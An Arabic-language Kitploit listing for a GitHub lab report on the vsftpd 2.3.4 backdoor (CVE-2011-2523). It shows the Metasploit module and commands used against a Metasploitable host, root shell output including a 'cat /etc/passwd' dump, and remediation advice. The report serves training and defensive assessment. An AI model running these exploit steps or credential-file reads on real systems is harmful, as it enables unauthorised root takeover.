Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
vsftpd-234-vuln-report — تقييم الثغرات واستغلال vsftpd 2.3.4 (CVE-2011-2523) باستخدام Metasploit. يتضمن التقرير الكامل وإثبات الوصول الجذري. | Kitploit
أدوات/GitHubGitHub/vedpakhare/vsftpd-234-vuln-report
أطر الاستغلالتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubvedpakhare/vsftpd-234-vuln-report

vsftpd-234-vuln-report

تقييم الثغرات واستغلال vsftpd 2.3.4 (CVE-2011-2523) باستخدام Metasploit. يتضمن التقرير الكامل وإثبات الوصول الجذري.

عرض المستودعالموقع الإلكتروني
21منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

💥 تقرير استغلال الباب الخلفي في vsftpd 2.3.4

استغلال ثغرة معروفة في vsftpd 2.3.4 باستخدام Metasploit.

📌 تفاصيل الهدف

  • عنوان IP الهدف: 192.168.150.133
  • الخدمة: FTP
  • الإصدار القابل للاستغلال: vsftpd 2.3.4
  • وحدة الاستغلال: exploit/unix/ftp/vsftpd_234_backdoor
  • الحمولة: قشرة أوامر (TCP)

🔍 ملخص الثغرة

يحتوي vsftpd 2.3.4 على باب خلفي خبيث يفتح قشرة أوامر على المنفذ 6200 عند تلقي اسم مستخدم مصمم خصيصًا (ينتهي بـ :)).

CVE: CVE-2011-2523


🚀 خطوات الاستغلال

root@kitploit:~
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.150.133
run

💥 تم الوصول إلى القشرة:

root@kitploit:~
whoami
> root

id
> uid=0(root) gid=0(root)

hostname
> metasploitable

uname -a
> Linux metasploitable 2.6.24-16-server #1 SMP ...

cat /etc/passwd
> root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  ...

🔐 الأثر

وصول قشرة الجذر يمنح المهاجم سيطرة كاملة على النظام المستهدف — بما في ذلك تصعيد الامتيازات، والحركة الجانبية، وسرقة البيانات، والوصول المستمر.


✅ التوصيات

  • لا تستخدم vsftpd 2.3.4.
  • قم بالترقية إلى إصدار آمن ومدعوم.
  • قم بتقييد الوصول الخارجي إلى FTP.
  • راقب الحركة المشبوهة على المنفذ 6200.

📄 التقرير

📝 تقرير PDF كامل متاح في هذا المستودع: vsftpd-exploit-report.pdf


📚 المراجع

  • معلومات وحدة Rapid7
  • CVE-2011-2523 - NVD

👨‍💻 المؤلف

صُنع بـ 🔥 بواسطة vedpakhare

تنزيل الأداة